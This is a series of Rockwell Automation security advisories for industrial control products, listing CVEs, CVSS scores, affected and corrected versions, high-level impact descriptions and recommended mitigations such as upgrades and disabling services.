Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

PN1631 | PN1631 | PowerMonitor™ 1000 – Cross-Site Scripting Vulnerability

Published Date:

July 11, 2023

Last Updated:

September 09, 2025

CVE IDs:

CVE-2023-2072

Products:

1408 PowerMonitor 1000

CVSS Scores:

8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 – July 11, 2023

Version 1.1 - September 9, 2025

Affected Products

Affected Product (automated)	First Known in Software Revision	Corrected in Software Revision
PowerMonitor™ 1000	V4.011	V4.019

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues. The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and to improving business environments.

CVE-2023-2072 IMPACT
The PowerMonitor 1000 contains stored cross site scripting security issues within the web page of the product. The pages do not require privileges to access and can be injected with code by an attacker. This could be used to leverage an attack on an authenticated user. The result being remote code execution and the complete loss of confidentiality, integrity, and availability of the product.

CVSS Base Score: 8.8

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-787 Out-Of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigation and our suggested security best practices below to minimize the potential risks.

Upgrade to V4.019 which has been patched to mitigate these issues.
Security Best Practices: QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

CVE-2023-2072 JSON

Glossary

Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

PN1627 | PN1627 | FactoryTalk® System Services affecting FactoryTalk® Policy Manager – Multiple Vulnerabilities

Published Date:

June 13, 2023

Last Updated:

September 09, 2025

CVE IDs:

CVE-2023-2639, CVE-2023-2637, CVE-2023-2638

Products:

FactoryTalk Policy Manager, FactoryTalk System Services, FactoryTalk Services Platform

CVSS Scores:

4.1, 5.9, 7.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - June 13, 2023

Version 1.1 - September 9, 2015 - Updated for better readability

Affected Products

Affected Product (automated)	First Known in Software Version	Corrected in Software Version
FactoryTalk® Services Platform * Only if the following were installed: FactoryTalk® Policy Manager v6.11.0 FactoryTalk® System Services v6.11.0	6.11.00	6.30.00

Security Issue Details

Rockwell Automation received a report from Claroty regarding three security issues in FactoryTalk® System Services. If used, these security issues could result in information disclosure, loading of malicious configuration files, or the elevation of privileges from a user to an administrator.

FactoryTalk® Policy Manager is dependent upon FactoryTalk® System Services and both components must be installed together. Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues.

CVE-2023-2637 IMPACT
A hard-coded cryptographic key may lead to privilege escalation. FactoryTalk® System Services uses a hard-coded cryptographic key to generate administrator cookies. This security issue could allow a local, authenticated non-admin user to generate an invalid administrator cookie. This would give them administrative privileges to the FactoryTalk® Policy Manger database. This would allow the threat actor to make harmful changes to the database. The changes would then be used when a legitimate FactoryTalk® Policy Manager user deploys a security policy model. User interaction is required for this security issue to be successfully used.

CVSS Base Score: 7.3

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H.

 CWE: CWE-321: Use of Hard-coded Cryptographic Key

Known Exploited Vulnerability (KEV) database: No

CVE-2023-2638 IMPACT
A improper authorization in FTSSBackupRestore.exe could lead to the loading of harmful configuration archives. FactoryTalk® System Services does not verify that a backup configuration archive is password protected. This security issue could allow a local, authenticated non-admin user to craft a harmful backup archive. This wouldn't have password protection and will be loaded by FactoryTalk® System Services as a valid backup when a restore procedure takes places. User interaction is required for this security issue to be used.

CVSS Base Score: 5.9

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

 CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

CVE-2023-2639 IMPACT
An origin validation error may lead to information disclosure. There is an underlying feedback mechanism of FactoryTalk® System Services that transfers the FactoryTalk® Policy Manager rules to relevant devices on the network. This does not verify that the origin of the communication is from a legitimate local client device. It could allow a threat actor to create a harmful website that will send a harmful script. The script can connect to the local WebSocket endpoint and wait for events as if it was a valid client device. If used, a threat actor could receive information including whether FactoryTalk® Policy Manager is installed. It could also allow the treat actor to view the entire security policy. User interaction is required for this to be used.

CVSS Base Score: 4.1

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

 CWE: CWE-346: Origin Validation Error

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations and security best practices below.

Upgrade to 6.30.00 or later which has been patched to mitigate these issues.
For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
- System Security Design Guidelines Reference Manual publication, SECURE-RM001
- Configure System Security Features User Manual, SECURE-UM001
Implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

CVE-2023-2637 JSON
CVE-2023-2638 JSON
CVE-2023-2639 JSON

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Medium Strength Ciphers: encryption methods that use key lengths of at least 64 bits and less than 112bits, or those with key lengths at least 56 bits and less than 112bits

High

PN1628 | PN1628 | Apache Portable Runtime Vulnerability in FactoryTalk® Edge Gateway

Published Date:

June 13, 2023

Last Updated:

September 09, 2025

CVE IDs:

CVE-2021-35940, CVE-2017-12613

Products:

FactoryTalk Edge Gateway

CVSS Scores:

7.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - June 13, 2023

Version 1.1 - September 9, 2025 - Updated for readability

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® Edge Gateway	v1.03.00	v1.04.00

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues. The security of our products is important to us as your industrial automation supplier. This irregularity was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving production environments.

CVE-2021-35940 IMPACT
An out of bounds array read security issue was fixed in the apr_time_exp*() function in the Apache Portable Runtime v1.6.3 (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch causing version 1.7.0 to regress compared to 1.6.3. Therefore it is vulnerable to the same issue. If exploited, a threat actor could potentially read confidential data or cause the software to become unavailable.

CVSS Base Score: 7.1

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

 CWE: CWE 125 Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigation below and our security best practices to minimize the risks .

Update to v1.04.00 which mitigates the issue.
Security Best Practicies: QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE 2021 35940 JSON

High

PN1629 | PN1629 | Denial-of-Service Vulnerability in FactoryTalk® Transaction Manager

Published Date:

June 13, 2023

Last Updated:

September 26, 2025

CVE IDs:

CVE-2023-2778

Products:

FactoryTalk Transaction Manager

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - June 13, 2023

Version 1.1 - Septeber 26, 2025

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® Transaction Manager	<=v13.10	BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess for security issues. The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to full transparency and the improvement of all business environments.

CVE-2023-2778 IMPACT
A denial-of-service (DoS) security issue exists in the affected products. This security issue can be used by sending a modified packet to port 400. If used, the application could crash or experience a high CPU or memory usage condition. This would cause intermittent application functionality issues. The application would need to be restarted to recover from the DoS.

CVSS Base Score 7.5

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 CWE: CWE-400 Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations . and our suggested security best practices below to minimize the risks.

Customers should follow the instructions in BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10 to install the patch to mitigate the issue.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-2778 JSON

Glossary

Central Processing Unit: (CPU) the brain of your computer, processing instructions from programs and components

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

PN1625 | PN1625 | Inadequate Encryption Vulnerability in ThinManager®

Published Date:

May 12, 2023

Last Updated:

September 09, 2025

CVE IDs:

CVE-2023-2443

Products:

ThinManager

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.2

Revision History

Version 1.0 - May 11, 2023
Version 1.1 - May 12, 2023 – Updated First Known in Software Version

Version 1.2 - September 9, 2025 - Updated for readability

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
ThinManager ®	v13.0.0 and v13.0.1	v13.0.2

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues.

CVE-2023-2443 IMPACT
The affected product allows use of medium strength ciphers. If the client requests an insecure cipher, a threat actor could decrypt traffic sent between the client and server Application Programming Interface (API).

CVSS Base Score: 7.5/10

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

 CWE: Inadequate Encryption Strength

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations and our suggested security best practices found below to minimize risks.

Upgrade to v13.0.2.
Do not use 3DES encryption algorithm.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Medium Strength Ciphers: encryption methods that use key lengths of at least 64 bits and less than 112bits, or those with key lengths at least 56 bits and less than 112bits

High

PN1622 | PN1622 | ArmorStart® ST 281E, 284EE Vulnerable to Multiple XSS Vulnerabilities

Published Date:

May 11, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2023-29030, CVE-2023-29022, CVE-2023-29028, CVE-2023-29027, CVE-2023-29023, CVE-2023-29026, CVE-2023-29029, CVE-2023-29031, CVE-2023-29024, CVE-2023-29025

Products:

ArmorStart

CVSS Scores:

4.7, 7.0, 5.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - May 11, 2023

Version 1.1 - September 8, 2025 - Updated for better readability

Affected Products

Affected Product (automated)	First Known in Firmware Revision	Corrected in Firmware Revision
ArmorStart® ST 281E	v2.004.06	N/A
ArmorStart® ST 284E	all	N/A
ArmorStart® ST 280E	all	N/A

Security Issue Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues.

CVE-2023-29031 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0

 CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29030 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0 (High)

 CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29023 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0 (High)

 CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29024 IMPACT
A cross site scripting vulnerability was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this.

CVSS Base Score: 5.5 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29025 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

CVE-2023-29026 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface.This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

CVE-2023-29027 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

CVE-2023-29028 IMPACT
A cross site scripting vulnerability was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

CVE-2023-29029 IMPACT
A cross site scripting security issue was discovered. Thist could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

CVE-2023 29022 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

 CWE: CWE-20 Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the below risk mitigation.

Disable the webserver during normal use. The webserver is disabled by default and should only be enabled to modify configurations. After modifying configurations, the web server should be disabled.
For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
- System Security Design Guidelines Reference Manual publication, SECURE-RM001
- Configure System Security Features User Manual, SECURE-UM001
Customers should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

Glossary

Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

Critical

PN1623 | PN1623 | PanelView™ 800 – Remote Code Execution Vulnerabilities

Published Date:

May 11, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2019-16748, CVE-2020-36177

Products:

PanelView 800

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - May 11, 2023

Version 1.1 - September 8, 2025

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
PanelView™ 800 - 2711R-T4T	V5.011	V8.011
PanelView™ 800 - 2711R-T7T	V5.011	V8.011
PanelView™ 800 - 2711R-T10T	V5.011	V8.011

Vulnerability Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the following security issues.

CVE-2020-36177 IMPACT
RsaPad_PSS in WolfSSL before version 4.6.0 has an out-of-bounds write. This is for certain relationships between key size and digest size. It is utilized in the PanelView™ 800 and could allow an attacker to accomplish a heap buffer overflow. This happens if the user has the email feature enabled in the project file where WolfSSL is used. The feature is disabled by default.

CVSS Base Score: 9.8

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 CWE: CWE-787 Out-Of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2019-16748 IMPACT
In WolfSSL through version 4.1.0, there is a missing sanity check of memory accesses in parsing ASN.1 certificate data while handshaking. There is a one-byte heap-based buffer over-read in CheckCertSignature ex in wolfcrypt/src/asn.c. WolfSSL that is utilized in the PanelView™ 800. This could allow an attacker to accomplish a heap buffer overflow if the user has the email feature enabled in the project file where WolfSSL is used. This feature is disabled by default.

CVSS Base Score: 9.8

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-125 Out-Of-Bounds Read

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the below risk mitigations.

Upgrade to V8.011 which has been patched to mitigate these issues.
Ensure that the email feature is disabled (This is disabled by default).
For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
- System Security Design Guidelines Reference Manual publication, SECURE-RM001
- Configure System Security Features User Manual, SECURE-UM00
Customers should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

Glossary

ASN.1: Abstract Syntax Notation One is a standard interface description language for defining data structures that can be serialized and deserialized in a cross-platform way

Handshaking: the process of establishing a connection between two devices or systems before actual data transmission begins

Heap-based Memory Buffer Overflow: a type of buffer overflow that occurs in the heap data area. Memory on the heap is dynamically allocated at runtime and typically contains program data.

Out-of-Bounds Write: when the software writes data past the end or before the beginning of an intended buffer, leading to data corruption, crashes or code execution

RsaPad_PSS: (RSA-Public Key Signature Scheme) a cryptographic method that uses the RSA algorithm for signing and verifying messages

WolfSSL: a small, portable SSL/TLS library designed for embedded system and RTOS environments

High

PN1626 | PN1626 | Cross Site Request Forgery in FactoryTalk® Vantagepoint®

Published Date:

May 11, 2023

Last Updated:

September 26, 2025

CVE IDs:

CVE-2023-2444

Products:

FactoryTalk VantagePoint

CVSS Scores:

7.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1..1

Revision History

Version 1.0 - May 11, 2023

Version 1.1 - September 26, 2025

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® Vantagepoint®	<v8.40	V8.40 and later

Vulnerability Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess for security issues.

CVE-2023-2444 IMPACT
A cross site request forgery security issue exists in the affected product. This security issue can be used in two ways. In one way an attacker sends a harmful link to a computer that is on the same domain as the FactoryTalk® Vantagepoint® server. A user then clicks the link, and the attacker impersonates the legitimate user and send requests to the affected product.

A second way, an attacker sends an untrusted link to a computer that is not on the same domain as the server. A user then opens the FactoryTalk® Vantagepoint® website and enters credentials for the FactoryTalk® Vantagepoint® server. The user then clicks on the harmful link for a cross site request forgery attack to be successful.

CVSS Base Score: 7.1/10

 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H

 CWE: CWE-345 Insufficient Verification of Data Authenticity

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use our security best practices to minimize risks.

Provide training about social engineering attacks, such as phishing.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-2444 JSON

Glossary

Cross Site Request Forgery: (CSRF) an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated

Phishing: cyberattack that uses fraudulent emails, text messages, phone calls or websites to trick people into sharing sensitive data, downloading malware or otherwise exposing themselves to cybercrime

Critical

PN1624 | Open Ports Vulnerability in Kinetix 5500 EtherNet/IP Servo Drive

Published Date:

May 11, 2023

Last Updated:

October 16, 2024

CVE IDs:

CVE-2023-1834

Products:

2198 Kinetix 5500 Drive

CVSS Scores (v3.1):

9.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - May 11, 2023

Version 1.1 - September 10, 2025 - Updated for readability

Affected Products

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
Kinetix 5500 manufactured between May 2022 and January 2023 *The manufacturing date of the drive is stated on the product label.	v7.13	Customers should upgrade to versions v7.14 or later to close the ports, which mitigates this issue.

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues..

CVE-2023-1834 IMPACT
Rockwell Automation was made aware that Kinetix® 5500 drives, manufactured between May 2022 and January 2023 that are running v7.13. These may have the telnet and FTP ports open by default. This could potentially allow attackers unauthorized access to the device through the open ports.

CVSS Base Score: 9.4/10

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H 

 CWE: CWE 284 Improper Access Control

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected drives should use the risk mitigations and our suggested security best practices to minimize risks..

Upgrade to v7.14
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-1834 JSON

Glossary

FTP: (File Transfer Protocol) uses two primary ports for its operations: Port 21 and Port 20. These ports play distinct roles in facilitating file transfers between clients and servers.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Telnet: Teletype Network and is a client/server application protocol that provides access to virtual terminals of remote systems on local area networks or the Internet

High

PN1621 | PN1621 | Arena® Simulation – Multiple Vulnerabilities

Published Date:

May 09, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2023-29460, CVE-2023-29462, CVE-2023-29461

Products:

Arena

CVSS Scores:

7.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - May 9, 2023

Version 1.1 - September 8, 2025 - Update for better readability

Affected Products

Affected Product (automated)	First Known in Software Version	Corrected in Software Version
Arena® Simulation Software	V16.00	16.20.01

Security Issue Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues.

CVE-2023-29460 IMPACT
An arbitrary code execution security issue was reported to Rockwell Automation that could allow a threat actor to use unauthorized arbitrary code to the software by using a memory buffer overflow.

CVSS Base Score: 7.8

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29461 IMPACT
An arbitrary code execution security issue was reported to Rockwell Automation that could allow a threat actor to use unauthorized arbitrary code on the software by using a memory buffer overflow in the heap.

CVSS Base Score: 7.8

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29462 IMPACT
An arbitrary code execution seurity issue was reported to Rockwell Automation that could allow a threat actor to use unauthorized arbitrary code on the software by using a memory buffer overflow in the heap.

CVSS Base Score: 7.8

 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software shoud use the below risk mitigations.

Upgrade to 16.20.01 which has been patched to mitigate these issues.
For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
- System Security Design Guidelines Reference Manual publication, SECURE-RM001
- Configure System Security Features User Manual, SECURE-UM001
Customer should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks..

Additional Resources

Glossary

Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Memory Buffer Overflow: occurs when a program writes more data to a buffer than it can hold. This can lead to data corruption, program crashes, or unintended behavior

Critical

PN1410 | PN1410 | FactoryTalk® Diagnostics Vulnerable to Remote Code Execution

Published Date:

April 10, 2023

Last Updated:

April 10, 2023

CVE IDs:

CVE-2020-6967

Products:

FactoryTalk Services Platform

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.3

Revision History

Version 1.0 – February 20, 2020. Initial Release
Version 1.1 – June 18, 2020. Pwn2Own Co-Discovery
Version 1.2 – February 10, 2023
Version 1.3 – April 10, 2023 – Added v6.31 Mitigations

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported a remote code execution (RCE) vulnerability in FactoryTalk® Services Platform to Rockwell Automation. Specifically, the vulnerability is found in the FactoryTalk Diagnostics subsystem, which provides customers the functionality to collect and view diagnostic messages from the FactoryTalk system for analysis and troubleshooting purposes.

FactoryTalk Diagnostics is utilized by many Rockwell Automation® products. We encourage customers to follow the steps provided to understand if they are affected.

Special thanks to rgod of 9sg working with ZDI to find this vulnerability. This vulnerability was co-discovered during the first ever Industrial Control Systems (ICS) Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI).

Affected Products

FactoryTalk Services Platform (v2.00 – v6.11)
The FactoryTalk Services Platform is delivered as part of the FactoryTalk suite of software from Rockwell Automation. Including most products branded FactoryTalk or Studio 5000® software.

Vulnerability Details

CVE-2020-6967: Remote Code Execution due to Vulnerable .NET Remoting Instance
FactoryTalk Diagnostics exposes a remote network port at tcp/8082, which may allow an attacker to execute arbitrary code with SYSTEM level privileges.

CVSS v3.1 Base Score: 9.8/CRITICAL CVSS Vector String: AV:N/AC:L/PR:N/UI:N/SC:U/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10268

Risk Mitigation & User Action

Rockwell Automation will resolve this vulnerability in the next release of the FactoryTalk Services Platform. Until then, customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the PN1354 - Industrial Security Advisory Index to stay notified.

Update: The vulnerability has been resolved with the release of FactoryTalk Services Platform V6.31.

Product Family	Suggested Actions
FactoryTalk Services Platform V6.31	No actions are necessary: Version supports use of Microsoft Windows Communication Foundation (WCF) which avoids the vulnerability. Version supports use of .NET Remoting (system default) with connections restricted to a local port; mitigating the vulnerability.

Product Family

Suggested Actions

FactoryTalk Services Platform V2.00 – V6.11

We have provided guidance for customers affected by this vulnerability to assess whether the service is installed, and steps for implementing the recommended mitigations. Customers should consider implementing the following measures based on their needs:

Upgrade to FactoryTalk Services Platform V6.31.
Recommended action for versions that predate v6.20 upgrade to version 6.20 or later; this version restricts connection settings to only the local port. If it is not possible to update:
Alternately for versions 2.74, 2.80, 2.81, 2.90, 3.00, 6.10, or 6.11, install the patch at BF24822 - Patch: FactoryTalk Diagnostics Local Reader service connection settings restricted to local access only, FactoryTalk Services 6.11, 6.10, 3.00, 2.90, 2.80, 2.81, 2.74 to restrict connections settings to only the local port.
For versions that predate v2.74 it is recommended to upgrade to a more recent version.
Disable the Remote Diagnostics Service if this service is not in use. Disabling this service does not result in data loss.
If the service is in use, use Windows Firewall configuration to help prevent remote connection to the effected port.
Steps to perform both solutions can be found in Risk mitigation for FactoryTalk Diagnostics remoting endpoint.

Note: A Snort rule for this issue is available in Snort’s developer rules (sid: 32474).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that .NET Remoting from unauthorized sources are blocked.
Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.
Consider implementing network security protocols for software systems, such as IPSec. Documentation is available in QA46277 - Deploying FactoryTalk Software with IPsec, outlining guidelines for implementing IPSec with FactoryTalk applications.

Software/PC-based Mitigation Strategies

Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in QA17329 - Using Rockwell Automation Software Products with AppLocker.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

Use trusted software, software patches antivirus/antimalware programs and interact only with trusted websites and attachments.
